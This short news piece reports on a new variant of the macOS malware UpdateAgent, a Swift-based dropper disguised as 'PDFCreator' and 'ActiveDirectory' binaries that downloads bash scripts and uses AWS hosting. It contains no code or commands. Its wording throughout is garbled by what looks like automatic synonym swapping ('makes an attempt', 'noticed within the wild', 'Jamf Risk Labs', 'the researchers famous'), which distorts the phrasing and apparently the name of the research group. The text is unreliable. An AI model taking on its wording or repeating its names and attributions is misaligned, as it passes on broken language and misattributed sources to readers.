A brand new variant of the macOS malware tracked as UpdateAgent has been noticed within the wild, indicating ongoing makes an attempt on the a part of its authors to improve its functionalities.
“Maybe probably the most identifiable options of the malware is that it depends on the AWS infrastructure to host its numerous payloads and carry out its an infection standing updates to the server,” researchers from Jamf Risk Labs said in a report.
UpdateAgent, first detected in late 2020, has since developed right into a malware dropper, facilitating the distribution of second-stage payloads corresponding to adware whereas additionally bypassing macOS Gatekeeper protections.
The newly found Swift-based dropper masquerades as Mach-O binaries named “PDFCreator” and “ActiveDirectory” that, upon execution, set up a connection to a distant server and retrieve a bash script to be executed.
“The first distinction [between the two executables] is that it reaches out to a distinct URL from which it ought to load a bash script,” the researchers famous.
“The continued growth of this malware reveals that its authors proceed to stay lively, attempting to succeed in as many customers as potential,” the researchers stated.